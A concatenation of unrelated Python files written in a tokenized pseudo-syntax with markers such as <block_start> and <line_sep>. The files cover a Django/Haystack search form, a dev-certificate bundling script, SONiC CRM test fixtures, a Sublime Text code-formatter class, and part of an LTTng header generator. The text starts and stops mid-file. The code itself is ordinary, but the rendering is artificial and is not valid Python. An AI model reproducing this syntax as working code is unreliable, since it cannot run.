required=<false>)<def_stmt>search self<block_start>self.parse_error=<none># error return from parser sqs=self.searchqueryset.all().filter(replaced=<false>)<if_stmt>self.cleaned_data.get('q')# The prior code corrected for an failed match of complete words, as documented # in issue #2308. This version instead uses an advanced query syntax in which # "word" indicates an exact match and the bare word indicates a stemmed match. <block_start>cdata=self.cleaned_data.get('q')<try_stmt><block_start>parser=ParseSQ()<line_sep>parsed=parser.parse(cdata)<line_sep>sqs=sqs.filter(parsed)<block_end><except_stmt>ValueError<as>e<block_start>sqs=self.searchqueryset.none()<line_sep>self.parse_error="Value error: {}. No matches. Please try again".format(e.value)<line_sep><return>sqs<block_end><except_stmt>MatchingBracketsNotFoundError<as>e<block_start>sqs=self.searchqueryset.none()<line_sep>self.parse_error="{} No matches. Please try again.".format(e.value)<line_sep><return>sqs<block_end><except_stmt>MalformedDateError<as>e<block_start>sqs=self.searchqueryset.none()<line_sep>self.parse_error="{} No matches. Please try again.".format(e.value)<line_sep><return>sqs<block_end><except_stmt>FieldNotRecognizedError<as>e<block_start>sqs=self.searchqueryset.none()<line_sep>self.parse_error=("{} Field delimiters include title, contributor, subject, etc. "+"Please try again.").format(e.value)<line_sep><return>sqs<block_end><except_stmt>InequalityNotAllowedError<as>e<block_start>sqs=self.searchqueryset.none()<line_sep>self.parse_error="{} No matches. Please try again.".format(e.value)<line_sep><return>sqs<block_end><block_end>geo_sq=<none><if_stmt>self.cleaned_data['NElng']<and>self.cleaned_data['SWlng']<block_start><if_stmt>float(self.cleaned_data['NElng'])<g>float(self.cleaned_data['SWlng'])<block_start>geo_sq=SQ(east__lte=float(self.cleaned_data['NElng']))<line_sep>geo_sq.add(SQ(east__gte=float(self.cleaned_data['SWlng'])) SQ.AND)<block_end><else_stmt><block_start>geo_sq=SQ(east__gte=float(self.cleaned_data['SWlng']))<line_sep>geo_sq.add(SQ(east__lte=float(180)) SQ.OR)<line_sep>geo_sq.add(SQ(east__lte=float(self.cleaned_data['NElng'])) SQ.AND)<line_sep>geo_sq.add(SQ(east__gte=float(-180)) SQ.AND)<block_end><block_end><if_stmt>self.cleaned_data['NElat']<and>self.cleaned_data['SWlat']# latitude might be specified without longitude <block_start><if_stmt>geo_sq<is><none><block_start>geo_sq=SQ(north__lte=float(self.cleaned_data['NElat']))<block_end><else_stmt><block_start>geo_sq.add(SQ(north__lte=float(self.cleaned_data['NElat'])) SQ.AND)<block_end>geo_sq.add(SQ(north__gte=float(self.cleaned_data['SWlat'])) SQ.AND)<block_end><if_stmt>geo_sq<is><not><none><block_start>sqs=sqs.filter(geo_sq)<block_end># Check to see if a start_date was chosen. start_date=self.cleaned_data['start_date']<line_sep>end_date=self.cleaned_data['end_date']<line_sep># allow overlapping ranges # cs < s < ce OR s < cs => s < ce # AND # cs < e < ce OR e > ce => cs < e <if_stmt>start_date<and>end_date<block_start>sqs=sqs.filter(SQ(end_date__gte=start_date)&SQ(start_date__lte=end_date))<block_end><elif_stmt>start_date<block_start>sqs=sqs.filter(SQ(end_date__gte=start_date))<block_end><elif_stmt>end_date<block_start>sqs=sqs.filter(SQ(start_date__lte=end_date))<block_end><if_stmt>self.cleaned_data['coverage_type']<block_start>sqs=sqs.filter(coverage_types__in=[self.cleaned_data['coverage_type']])<block_end>creator_sq=<none><line_sep>contributor_sq=<none><line_sep>owner_sq=<none><line_sep>subject_sq=<none><line_sep>content_type_sq=<none><line_sep>availability_sq=<none><line_sep># We need to process each facet to ensure that the field name and the # value are quoted correctly and separately: <for_stmt>facet self.selected_facets<block_start><if_stmt>":"<not><in>facet<block_start><continue><block_end>field,value=facet.split(":" 1)<line_sep>value=sqs.query.clean(value)<if_stmt>value<block_start><if_stmt>"creator"<in>field<block_start><if_stmt>creator_sq<is><none><block_start>creator_sq=SQ(creator__exact=value)<block_end><else_stmt><block_start>creator_sq.add(SQ(creator__exact=value) SQ.OR)<block_end><block_end><if_stmt>"contributor"<in>field<block_start><if_stmt>contributor_sq<is><none><block_start>contributor_sq=SQ(contributor__exact=value)<block_end><else_stmt><block_start>contributor_sq.add(SQ(contributor__exact=value) SQ.OR)<block_end><block_end><elif_stmt>"owner"<in>field<block_start><if_stmt>owner_sq<is><none><block_start>owner_sq=SQ(owner__exact=value)<block_end><else_stmt><block_start>owner_sq.add(SQ(owner__exact=value) SQ.OR)<block_end><block_end><elif_stmt>"subject"<in>field<block_start><if_stmt>subject_sq<is><none><block_start>subject_sq=SQ(subject__exact=value)<block_end><else_stmt><block_start>subject_sq.add(SQ(subject__exact=value) SQ.OR)<block_end><block_end><elif_stmt>"content_type"<in>field<block_start><if_stmt>content_type_sq<is><none><block_start>content_type_sq=SQ(content_type__exact=value)<block_end><else_stmt><block_start>content_type_sq.add(SQ(content_type__exact=value) SQ.OR)<block_end><block_end><elif_stmt>"availability"<in>field<block_start><if_stmt>availability_sq<is><none><block_start>availability_sq=SQ(availability__exact=value)<block_end><else_stmt><block_start>availability_sq.add(SQ(availability__exact=value) SQ.OR)<block_end><block_end><else_stmt><block_start><continue><block_end><block_end><block_end><if_stmt>creator_sq<is><not><none><block_start>sqs=sqs.filter(creator_sq)<block_end><if_stmt>contributor_sq<is><not><none><block_start>sqs=sqs.filter(contributor_sq)<block_end><if_stmt>owner_sq<is><not><none><block_start>sqs=sqs.filter(owner_sq)<block_end><if_stmt>subject_sq<is><not><none><block_start>sqs=sqs.filter(subject_sq)<block_end><if_stmt>content_type_sq<is><not><none><block_start>sqs=sqs.filter(content_type_sq)<block_end><if_stmt>availability_sq<is><not><none><block_start>sqs=sqs.filter(availability_sq)<block_end><return>sqs<block_end><block_end>
<import_stmt>requests<import_stmt>os<line_sep>EXISTING_ROOT_PEM=requests.certs.where()<line_sep>root_dir=os.path.abspath(os.path.join(os.path.abspath(__file__) ".." ".." ".."))<line_sep>LOCAL_DEV_CERT=os.path.abspath(os.path.join(root_dir 'eng' 'common' 'testproxy' 'dotnet-devcert.crt'))<line_sep>COMBINED_FILENAME=os.path.basename(LOCAL_DEV_CERT).split(".")[0]+".pem"<line_sep>COMBINED_FOLDER=os.path.join(root_dir '.certificate')<line_sep>COMBINED_LOCATION=os.path.join(COMBINED_FOLDER COMBINED_FILENAME)<def_stmt>copy_cert_content <block_start><with_stmt>open(LOCAL_DEV_CERT 'r')<as>f<block_start>data=f.read()<block_end><if_stmt><not>os.path.exists(COMBINED_FOLDER)<block_start>os.mkdir(COMBINED_FOLDER)<block_end><with_stmt>open(COMBINED_LOCATION 'w')<as>f<block_start>f.write(data)<block_end><block_end><def_stmt>combine_cert_file <block_start><with_stmt>open(EXISTING_ROOT_PEM 'r')<as>f<block_start>content=f.readlines()<line_sep><block_end><with_stmt>open(COMBINED_LOCATION 'a')<as>f<block_start>f.writelines(content)<block_end><block_end><if_stmt>__name__<eq>"__main__"<block_start>copy_cert_content()<line_sep>combine_cert_file()<line_sep>print("Set the following certificate paths:")<line_sep>print("\tSSL_CERT_DIR={}".format(os.path.dirname(COMBINED_LOCATION)))<line_sep>print("\tREQUESTS_CA_BUNDLE={}".format(COMBINED_LOCATION))<if_stmt>os.getenv('TF_BUILD' <false>)<block_start>print("##vso[task.setvariable variable=SSL_CERT_DIR]{}".format(os.path.dirname(COMBINED_LOCATION)))<line_sep>print("##vso[task.setvariable variable=REQUESTS_CA_BUNDLE]{}".format(COMBINED_LOCATION))<block_end><block_end>
<import_stmt>logging<import_stmt>pytest<import_from_stmt>tests.common.utilities wait_until<import_from_stmt>utils get_crm_resources check_queue_status sleep_to_wait<line_sep>CRM_POLLING_INTERVAL=1<line_sep>CRM_DEFAULT_POLL_INTERVAL=300<line_sep>MAX_WAIT_TIME=120<line_sep>logger=logging.getLogger(__name__)<line_sep>@pytest.fixture(scope='module')<def_stmt>get_function_conpleteness_level pytestconfig<block_start><return>pytestconfig.getoption("--completeness_level")<block_end>@pytest.fixture(scope="module" autouse=<true>)<def_stmt>set_polling_interval duthost<block_start>wait_time=2<line_sep>duthost.command("crm config polling interval {}".format(CRM_POLLING_INTERVAL))<line_sep>logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))<line_sep>time.sleep(wait_time)<line_sep><yield><line_sep>duthost.command("crm config polling interval {}".format(CRM_DEFAULT_POLL_INTERVAL))<line_sep>logger.info("Waiting {} sec for CRM counters to become updated".format(wait_time))<line_sep>time.sleep(wait_time)<block_end>@pytest.fixture(scope='module')<def_stmt>withdraw_and_announce_existing_routes duthost localhost tbinfo<block_start>ptf_ip=tbinfo["ptf_ip"]<line_sep>topo_name=tbinfo["topo"]["name"]<line_sep>logger.info("withdraw existing ipv4 and ipv6 routes")<line_sep>localhost.announce_routes(topo_name=topo_name ptf_ip=ptf_ip action="withdraw" path="../ansible/")<line_sep>wait_until(MAX_WAIT_TIME CRM_POLLING_INTERVAL 0 <lambda>:check_queue_status(duthost "inq")<eq><true>)<line_sep>sleep_to_wait(CRM_POLLING_INTERVAL<times>100)<line_sep>ipv4_route_used_before=get_crm_resources(duthost "ipv4_route" "used")<line_sep>ipv6_route_used_before=get_crm_resources(duthost "ipv6_route" "used")<line_sep>logger.info("ipv4 route used {}".format(ipv4_route_used_before))<line_sep>logger.info("ipv6 route used {}".format(ipv6_route_used_before))<line_sep><yield>ipv4_route_used_before ipv6_route_used_before<line_sep>logger.info("announce existing ipv4 and ipv6 routes")<line_sep>localhost.announce_routes(topo_name=topo_name ptf_ip=ptf_ip action="announce" path="../ansible/")<line_sep>wait_until(MAX_WAIT_TIME CRM_POLLING_INTERVAL 0 <lambda>:check_queue_status(duthost "outq")<eq><true>)<line_sep>sleep_to_wait(CRM_POLLING_INTERVAL<times>5)<line_sep>logger.info("ipv4 route used {}".format(get_crm_resources(duthost "ipv4_route" "used")))<line_sep>logger.info("ipv6 route used {}".format(get_crm_resources(duthost "ipv6_route" "used")))<block_end>
# @author <NAME> # @copyright Copyright (c) 2008-2015, <NAME> aka LONGMAN (<EMAIL>) # @link http://longman.me # @license The MIT License (MIT) <import_stmt>os<import_stmt>sys<import_stmt>re<import_stmt>sublime<line_sep>directory=os.path.dirname(os.path.realpath(__file__))<line_sep>libs_path=os.path.join(directory 'lib')<if_stmt>libs_path<not><in>sys.path<block_start>sys.path.append(libs_path)<block_end><try_stmt># Python 3 <block_start><import_from_stmt>.phpformatter PhpFormatter<import_from_stmt>.jsformatter JsFormatter<import_from_stmt>.htmlformatter HtmlFormatter<import_from_stmt>.cssformatter CssFormatter<import_from_stmt>.scssformatter ScssFormatter<import_from_stmt>.pyformatter PyFormatter<import_from_stmt>.vbscriptformatter VbscriptFormatter<import_from_stmt>.coldfusionformatter ColdfusionFormatter<import_from_stmt>.goformatter GoFormatter<block_end><except_stmt>(ValueError)# Python 2 <block_start><import_from_stmt>phpformatter PhpFormatter<import_from_stmt>jsformatter JsFormatter<import_from_stmt>htmlformatter HtmlFormatter<import_from_stmt>cssformatter CssFormatter<import_from_stmt>scssformatter ScssFormatter<import_from_stmt>pyformatter PyFormatter<import_from_stmt>vbscriptformatter VbscriptFormatter<import_from_stmt>coldfusionformatter ColdfusionFormatter<import_from_stmt>goformatter GoFormatter<block_end><class_stmt>Formatter<block_start><def_stmt>__init__ self view syntax=<none><block_start>self.platform=sublime.platform()<line_sep>self.classmap={}<line_sep>self.st_version=2<if_stmt>sublime.version()<eq>''<or>int(sublime.version())<g>3000<block_start>self.st_version=3<block_end>self.file_name=view.file_name()<line_sep>self.settings=sublime.load_settings('CodeFormatter.sublime-settings')<line_sep>self.packages_path=sublime.packages_path()<line_sep>self.syntax_file=view.settings().get('syntax')<line_sep>self.syntax=syntax<or>self.get_syntax()<line_sep># map of settings names with related class map_settings_formatter=[('codeformatter_php_options' PhpFormatter) ('codeformatter_js_options' JsFormatter) ('codeformatter_css_options' CssFormatter) ('codeformatter_html_options' HtmlFormatter) ('codeformatter_python_options' PyFormatter) ('codeformatter_vbscript_options' VbscriptFormatter) ('codeformatter_scss_options' ScssFormatter) ('codeformatter_coldfusion_options' ColdfusionFormatter) ('codeformatter_go_options' GoFormatter) ]<for_stmt>name,_class map_settings_formatter<block_start>syntaxes=self.settings.get(name {}).get('syntaxes')<if_stmt><not>syntaxes<or><not>isinstance(syntaxes str)<block_start><continue><block_end><for_stmt>_formatter syntaxes.split(',')<block_start>self.classmap[_formatter.strip()]=_class<block_end><block_end><block_end><def_stmt>format self text<block_start>formatter=self.classmap[self.syntax](self)<try_stmt><block_start>stdout,stderr=formatter.format(text)<block_end><except_stmt>Exception<as>e<block_start>stdout=''<line_sep>stderr=str(e)<block_end><return>self.clean(stdout) self.clean(stderr)<block_end><def_stmt>exists self<block_start><return>self.syntax<in>self.classmap<block_end><def_stmt>get_syntax self<block_start>pattern=re.compile(r'Packages/.*/(.+?).(?=tmLanguage|sublime-syntax)')<line_sep>m=pattern.search(self.syntax_file)<line_sep>found=''<if_stmt>m<and>len(m.groups())<g>0<block_start>found=m.groups()[0]<block_end><return>found.lower()<block_end><def_stmt>format_on_save_enabled self<block_start><if_stmt><not>self.exists()<block_start><return><false><block_end>formatter=self.classmap[self.syntax](self)<line_sep><return>formatter.format_on_save_enabled(self.file_name)<block_end><def_stmt>clean self string<block_start><if_stmt>hasattr(string 'decode')<block_start>string=string.decode('UTF-8' 'ignore')<block_end><return>re.sub(r'\r\n|\r' '\n' string)<block_end><block_end>
#------------------------------------------------------------------------------------------------------- # Copyright (C) Microsoft. All rights reserved. # Licensed under the MIT license. See LICENSE.txt file in the project root for full license information. #------------------------------------------------------------------------------------------------------- <import_stmt>xml.dom.minidom<as>DOM<line_sep>lttngDataTypeMapping={"win:null":" " "win:Int64":"const __int64" "win:ULong":"const unsigned long" "win:count":"*" "win:Struct":"const char *" "win:GUID":"const int" "win:AnsiString":"const char*" "win:UnicodeString":"const char*" "win:Double":"const double" "win:Int32":"const signed int" "win:HexInt32":"const signed int" "win:Boolean":"const bool" "win:UInt64":"const unsigned __int64" "win:UInt32":"const unsigned int" "win:UInt16":"const unsigned short" "win:UInt8":"const unsigned char" "win:Int8":"const char" "win:Pointer":"const uintptr_t" "win:Binary":"const char"}<line_sep>ctfDataTypeMapping={"win:Int64":"ctf_integer" "win:HexInt64":"ctf_integer_hex" "win:ULong":"ctf_integer" "win:count":"ctf_sequence" "win:Struct":"ctf_sequence" "win:GUID":"ctf_sequence" "win:AnsiString":"ctf_string" "win:UnicodeString":"ctf_string" "win:Double":"ctf_float" "win:Int32":"ctf_integer" "win:HexInt32":"ctf_integer_hex" "win:Boolean":"ctf_integer" "win:UInt64":"ctf_integer" "win:UInt32":"ctf_integer" "win:UInt16":"ctf_integer" "win:HexInt16":"ctf_integer_hex" "win:UInt8":"ctf_integer" #actually a character "win:Int8":"ctf_integer" #actually a character "win:Pointer":"ctf_integer" "win:Binary":"ctf_sequence" "xs:string":"ctf_string" "xs:unsignedLong":"ctf_integer" "xs:unsignedInt":"ctf_integer"}<line_sep>palDataTypeMapping={"win:null":" " "win:Int64":"const __int64" "win:ULong":"const unsigned long" "win:count":"*" "win:Struct":"const void" "win:GUID":"const GUID" "win:AnsiString":"LPCSTR" "win:UnicodeString":"PCWSTR" "win:Double":"const double" "win:Int32":"const signed int" "win:HexInt32":"const signed int" "win:Boolean":"const bool" "win:UInt64":"const unsigned __int64" "win:UInt32":"const unsigned int" "win:UInt16":"const unsigned short" "win:UInt8":"const unsigned char" "win:Int8":"const char" "win:Pointer":"const void*" "win:Binary":"const char"}<line_sep>MAX_LTTNG_ARGS=10<def_stmt>getParamSequenceSize paramSequence estimate<block_start>total=0<line_sep>pointers=0<for_stmt>param paramSequence<block_start><if_stmt>param<in>["win:Int64" "win:UInt64" "win:Double"]<block_start>total<augadd>8<block_end><elif_stmt>param<in>["win:ULong" "win:Int32" "win:Boolean" ]<block_start>total<augadd>4<block_end><elif_stmt>param<eq>"GUID"<block_start>total<augadd>16<block_end><elif_stmt>param<in>["win:UInt16"]<block_start>total<augadd>2<block_end><elif_stmt>param<in>["win:Uint8" "win:Binary"]<block_start>total<augadd>1<block_end><elif_stmt>param<eq>"win:Pointer"<block_start><if_stmt>estimate<block_start>total<augadd>8<block_end><else_stmt><block_start>pointers<augadd>1<block_end><block_end><elif_stmt>estimate<block_start><if_stmt>param<in>["win:AnsiString" "win:Struct"]<block_start>total<augadd>32<block_end><elif_stmt>param<in>["win:UnicodeString"]<block_start>total<augadd>64<block_end><block_end><else_stmt><block_start><raise>Exception("Don't know size of "+param)<block_end><block_end><if_stmt>estimate<block_start><return>total<block_end><return>total pointers<block_end><class_stmt>Template<block_start><def_stmt>__repr__ self<block_start><return>"<Template "+self.name+" />"<block_end><def_stmt>__init__ self name prototypes dependencies structCounts arrayCounts<block_start>self.name=name<line_sep>self.signature=FunctionSignature()<line_sep>self.structCounts=structCounts<line_sep>self.arrayCounts=arrayCounts<for_stmt>variable prototypes.paramList<block_start><for_stmt>dependency dependencies[variable]<block_start><if_stmt><not>self.signature.getParam(dependency)<block_start>self.signature.append(dependency prototypes.getParam(dependency))<block_end><block_end><block_end><block_end>@property<def_stmt>num_params self<block_start><return>len(self.signature.paramList)<block_end><def_stmt>getParam self name<block_start><return>self.signature.getParam(name)<block_end>@property<def_stmt>estimatedSize self<block_start>total=getParamSequenceSize((self.getParam(paramName).winType<for>paramName self.signature.paramList) <true>)<if_stmt>total<l>32<block_start><return>32<block_end><elif_stmt>total<g>1024<block_start><return>1024<block_end><return>total<block_end><block_end><class_stmt>FunctionSignature<block_start><def_stmt>__repr__ self<block_start><return>', '.join(self.paramList)<block_end><def_stmt>__init__ self<block_start>self.LUT={}<line_sep>self.paramList=[]<block_end><def_stmt>append self variable param<block_start>self.LUT[variable]=param<line_sep>self.paramList.append(variable)<block_end><def_stmt>getParam self variable<block_start><return>self.LUT.get(variable)<block_end><def_stmt>getLength self<block_start><return>len(self.paramList)<block_end><block_end><class_stmt>FunctionParameter<block_start><def_stmt>__repr__ self<block_start><return>self.name<block_end><def_stmt>__init__ self winType name count outType length<block_start>self.winType=winType<line_sep>self.outType=outType<line_sep>self.name=name<line_sep>self.length=length<line_sep>self.count="win:null"<if_stmt>winType<eq>"win:GUID"<or>count<eq>"win:count"<block_start>self.count="win:count"<block_end><block_end><block_end>ignoredXmlAttributes=frozenset(["map"])<line_sep>usedXmlAttributes=frozenset(["name" "inType" "count" "length" "outType"])<line_sep>knownXmlAttributes=ignoredXmlAttributes|usedXmlAttributes<def_stmt>checkKnownAttributes nodes templateName<block_start><for_stmt>node nodes<block_start>nodeMap=node.attributes<for_stmt>attribute nodeMap.values()<block_start><if_stmt>attribute.name<not><in>knownXmlAttributes<block_start><raise>ValueError('Unknown attribute: '+attribute.name+' in template '+templateName)<block_end><block_end><block_end><block_end><def_stmt>getTopLevelElementsByTagName node tag<block_start><return>[e<for>e node.getElementsByTagName(tag)<if>e.parentNode<eq>node]<block_end><def_stmt>parseTemplateNodes templateNodes<block_start>templates={}<for_stmt>templateNode templateNodes<block_start>templateName=templateNode.getAttribute('tid')<line_sep>dataNodes=getTopLevelElementsByTagName(templateNode 'data')<line_sep>checkKnownAttributes(dataNodes templateName)<line_sep>functionPrototypes=FunctionSignature()<line_sep>arrayCounts={}<line_sep>structCounts={}<line_sep>var_Dependencies={}<for_stmt>dataNode dataNodes<block_start>variable=dataNode.getAttribute('name')<line_sep>wintype=dataNode.getAttribute('inType')<line_sep>outType=dataNode.getAttribute('outType')<line_sep>wincount=dataNode.getAttribute('count')<line_sep>winLength=dataNode.getAttribute('length')<line_sep>var_dependency=[variable]<if_stmt>winLength<block_start><if_stmt>wincount<block_start><raise>Exception("Both count and length properties found on "+variable+" in template "+templateName)<block_end><block_end><if_stmt>wincount.isdigit()<and>int(wincount)<eq>1<block_start>wincount=''<block_end><if_stmt>wincount<block_start><if_stmt>wincount.isdigit()<block_start><raise>Exception("Expect constant count to be length")<block_end><elif_stmt>functionPrototypes.getParam(wincount)<block_start>var_dependency.insert(0 wincount)<line_sep>arrayCounts[variable]=wincount<block_end><block_end>var_Dependencies[variable]=var_dependency<line_sep>functionParameter=FunctionParameter(wintype variable wincount outType winLength)<line_sep>functionPrototypes.append(variable functionParameter)<block_end>structNodes=getTopLevelElementsByTagName(templateNode 'struct')<for_stmt>structNode structNodes<block_start>structName=structNode.getAttribute('name')<line_sep>countName=structNode.getAttribute('count')<assert_stmt>(countName<in>functionPrototypes.paramList)<line_sep>#childData = structNode.getElementsByTagName("data") #names = [x.attributes['name'].value for x in childData] #types = [x.attributes['inType'].value for x in childData] structCounts[structName]=countName<line_sep>var_Dependencies[structName]=[countName structName]<line_sep>functionParameterPointer=FunctionParameter("win:Struct" structName "win:count" <none> <none>)<line_sep>functionPrototypes.append(structName functionParameterPointer)<block_end>templates[templateName]=Template(templateName functionPrototypes var_Dependencies structCounts arrayCounts)<block_end><return>templates<block_end><def_stmt>shouldPackTemplate template<block_start><return>template.num_params<g>MAX_LTTNG_ARGS<or>len(template.structCounts)<g>0<or>len(template.arrayCounts)<g>0<block_end><def_stmt>generateArgList template# Construct a TP_ARGS macro call, as defined in another macro, e.g. # # TP_ARGS( \ # int, my_integer_arg, \ # char*, my_string_arg \ # ) <block_start>header="TP_ARGS( \\\n"<line_sep>footer="\\\n)"<line_sep>args=[]<if_stmt>shouldPackTemplate(template)<block_start>args.append(" const unsigned int, length")<line_sep>args.append(" const char *, __data__")<block_end><else_stmt><block_start>signature=template.signature<for_stmt>param signature.paramList<block_start>functionParam=signature.getParam(param)<line_sep>wintypeName=functionParam.winType<line_sep>mappedType=lttngDataTypeMapping[wintypeName]<line_sep>winCount=functionParam.count<line_sep>mappedCount=lttngDataTypeMapping[winCount]<line_sep>arg=" "+mappedType<if_stmt>mappedCount<ne>" "<block_start>arg<augadd>mappedCount<block_end><elif_stmt>functionParam.length<block_start>arg<augadd>"*"<block_end>arg<augadd>", "+functionParam.name<line_sep>args.append(arg)<block_end><block_end><return>header+", \\\n".join(args)+footer<block_end><def_stmt>generateFieldList template# Construct a TP_FIELDS macro call, e.g. # TP_FIELDS( # ctf_string(my_string_field, my_string_arg) # ctf_integer(int, my_integer_field, my_integer_arg) # ) <block_start>header=" "+" TP_FIELDS(\n"<line_sep>footer="\n )"<line_sep>fieldList=[]<if_stmt>shouldPackTemplate(template)<block_start>fieldList.append(" ctf_integer(unsigned long, length, length)")<line_sep>fieldList.append(" ctf_sequence(char, __data__, __data__, unsigned long, length)")<block_end><else_stmt><block_start>signature=template.signature<for_stmt>param signature.paramList<block_start>functionParam=signature.getParam(param)<line_sep>wintypeName=functionParam.winType<line_sep>winCount=functionParam.count<line_sep>mappedCount=lttngDataTypeMapping[winCount]<line_sep>mappedType=lttngDataTypeMapping[wintypeName].replace("const " "")<if_stmt>functionParam.outType<block_start>wintypeName=functionParam.outType<block_end>ctf_type=<none><line_sep>field_body=<none><line_sep>varname=functionParam.name<if_stmt>param<in>template.structCounts<or>param<in>template.arrayCounts# This is a struct, treat as a sequence <block_start>countVar=template.structCounts.get(param template.arrayCounts.get(param))<line_sep>ctf_type="ctf_sequence"<line_sep>field_body=", ".join((mappedType varname varname "size_t" functionParam.prop))<block_end><elif_stmt>functionParam.length<block_start>ctf_type="ctf_sequence"<line_sep>field_body=", ".join((mappedType varname varname "size_t" functionParam.length))<block_end><else_stmt><block_start>ctf_type=ctfDataTypeMapping[wintypeName]<if_stmt>ctf_type<eq>"ctf_string"<block_start>field_body=", ".join((varname varname))<block_end><elif_stmt>ctf_type<eq>"ctf_integer"<or>ctf_type<eq>"ctf_integer_hex"<or>ctf_type<eq>"ctf_float"<block_start>field_body=", ".join((mappedType varname varname))<block_end><elif_stmt>ctf_type<eq>"ctf_sequence"<block_start><raise>Exception("ctf_sequence needs special handling: "+template.name+" "+param)<block_end><else_stmt><block_start><raise>Exception("Unhandled ctf intrinsic: "+ctf_type)<block_end><block_end># fieldList.append("// " + wintypeName) fieldList.append(" %s(%s)"%(ctf_type field_body))<block_end><block_end><return>header+"\n".join(fieldList)+footer<block_end><def_stmt>generateLttngHeader providerName lttngEventHeaderShortName templates events<block_start>headerLines=[]<line_sep>headerLines.append("")<line_sep>headerLines.append("#ifdef __int64")<line_sep>headerLines.append("#if TARGET_64")<line_sep>headerLines.append("#undef __int64")<line_sep>headerLines.append("#else")<line_sep>headerLines.append("#error \"Linux and OSX builds only support 64bit platforms\"")<line_sep>headerLines.append("#endif // TARGET_64")<line_sep>headerLines.append("#endif // __int64")<line_sep>headerLines.append("#undef TRACEPOINT_PROVIDER")<line_sep>headerLines.append("#undef TRACEPOINT_INCLUDE")<line_sep>headerLines.append("")<line_sep>headerLines.append("#define TRACEPOINT_PROVIDER "+providerName+"\n")<line_sep>headerLines.append("#define TRACEPOINT_INCLUDE \"./"+lttngEventHeaderShortName+"\"\n\n")<line_sep>headerLines.append("#if !defined(LTTNG_CHAKRA_H"+providerName+") || defined(TRACEPOINT_HEADER_MULTI_READ)\n\n")<line_sep>headerLines.append("#define LTTNG_CHAKRA_H"+providerName+"\n")<line_sep>headerLines.append("\n#include <lttng/tracepoint.h>\n\n")<for_stmt>templateName templates<block_start>template=templates[templateName]<line_sep>functionSignature=template.signature<line_sep>headerLines.append("")<line_sep>headerLines.append("#define "+templateName+"_TRACEPOINT_ARGS \\")<line_sep>tracepointArgs=generateArgList(template)<line_sep>headerLines.append(tracepointArgs)<line_sep>headerLines.append("TRACEPOINT_EVENT_CLASS(")<line_sep>headerLines.append(" "+providerName+",")<line_sep>headerLines.append(" "+templateName+",")<line_sep>headerLines.append(" "+templateName+"_TRACEPOINT_ARGS,")<line_sep>tracepointFields=generateFieldList(template)<line_sep>headerLines.append(tracepointFields)<line_sep>headerLines.append(")")<line_sep>headerLines.append("#define "+templateName+"T_TRACEPOINT_INSTANCE(name) \\")<line_sep>headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")<line_sep>headerLines.append(" "+providerName+",\\")<line_sep>headerLines.append(" "+templateName+",\\")<line_sep>headerLines.append(" name,\\")<line_sep>headerLines.append(" "+templateName+"_TRACEPOINT_ARGS \\")<line_sep>headerLines.append(")")<block_end>headerLines.append("")<line_sep>headerLines.append("")<line_sep>headerLines.append("TRACEPOINT_EVENT_CLASS(")<line_sep>headerLines.append(" "+providerName+",")<line_sep>headerLines.append(" emptyTemplate,")<line_sep>headerLines.append(" TP_ARGS(),")<line_sep>headerLines.append(" TP_FIELDS()")<line_sep>headerLines.append(")")<line_sep>headerLines.append("#define T_TRACEPOINT_INSTANCE(name) \\")<line_sep>headerLines.append("TRACEPOINT_EVENT_INSTANCE(\\")<line_sep>headerLines.append(" "+providerName+",\\")<line_sep>headerLines.append(" emptyTemplate,\\")<line_sep>headerLines.append(" name,\\")<line_sep>headerLines.append(" TP_ARGS()\\")<line_sep>headerLines.append(")")<line_sep>headerLines.append("")<for_stmt>eventNode events<block_start>eventName=eventNode.getAttribute('symbol')<line_sep>templateName=eventNode.getAttribute('template')<if_stmt><not>eventName<block_start><raise>Exception(eventNode+" event does not have a symbol")<block_end><if_stmt><not>templateName<block_start>headerLines.append("T_TRACEPOINT_INSTANCE("+eventName+")")<line_sep><continue><block_end>headerLines.append(templateName+"T_TRACEPOINT_INSTANCE("+eventName+")")<block_end>headerLines.append("#endif /* LTTNG_CHAKRA_H"+providerName+" */")<line_sep>headerLines.append("#include <lttng/tracepoint-event.h>")<line_sep><return>"\n".join(headerLines)<block_end><def_stmt>generateMethodBody template providerName eventName# Convert from ETW's windows types to LTTng compatiable types <block_start>methodBody=[""]<line_sep>functionSignature=template.signature<if_stmt><not>shouldPackTemplate(template)<block_start>invocation=["do_tracepoint("+providerName eventName]<for_stmt>paramName functionSignature.paramList<block_start>functionParam=functionSignature.getParam(paramName)<line_sep>wintypeName=functionParam.winType<line_sep>winCount=functionParam.count<line_sep>ctf_type=<none><if_stmt>functionParam.outType<block_start>ctf_type=ctfDataTypeMapping.get(functionParam.outType)<block_end><else_stmt><block_start>ctf_Type=ctfDataTypeMapping.get(winCount)<block_end><if_stmt><not>ctf_type<block_start>ctf_type=ctfDataTypeMapping[wintypeName]<block_end><if_stmt>ctf_type<eq>"ctf_string"<and>wintypeName<eq>"win:UnicodeString"# Convert wchar unicode string to utf8 <block_start><if_stmt>functionParam.length<block_start>methodBody.append("utf8::WideToNarrow "+paramName+"_converter("+paramName+", "+functionParam.length+");")<block_end><else_stmt><block_start>methodBody.append("utf8::WideToNarrow "+paramName+"_converter("+paramName+");")<block_end>invocation.append(paramName+"_converter")<block_end># elif ctf_type == "ctf_sequence" or wintypeName == "win:Pointer": <elif_stmt>wintypeName<eq>"win:Pointer"<block_start>invocation.append("("+lttngDataTypeMapping[wintypeName]+lttngDataTypeMapping[winCount]+")"+paramName)<block_end><else_stmt><block_start>invocation.append(paramName)<block_end><block_end>methodBody.append(",\n ".join(invocation)+");")<block_end><else_stmt># Packing results into buffer <block_start>methodBody.append("char stackBuffer["+str(template.estimatedSize)+"];")<line_sep>methodBody.append("char *buffer = stackBuffer;")<line_sep>methodBody.append("int offset = 0;")<line_sep>methodBody.append("int size = "+str(template.estimatedSize)+";")<line_sep>methodBody.append("bool fixedBuffer = true;")<line_sep>methodBody.append("bool success = true;")<for_stmt>paramName functionSignature.paramList<block_start>functionParameter=functionSignature.getParam(paramName)<if_stmt>paramName<in>template.structCounts<block_start>size="(unsigned int)"+paramName+"_ElementSize * (unsigned int)"+template.structCounts[paramName]<line_sep>methodBody.append("success &= WriteToBuffer((const char *)"+paramName+", "+size+", buffer, offset, size, fixedBuffer);")<block_end><elif_stmt>paramName<in>template.arrayCounts<block_start>size="sizeof("+lttngDataTypeMapping[functionParameter.winType]+") * (unsigned int)"+template.arrayCounts[paramName]<line_sep>methodBody.append("success &= WriteToBuffer((const char *)"+paramName+", "+size+", buffer, offset, size, 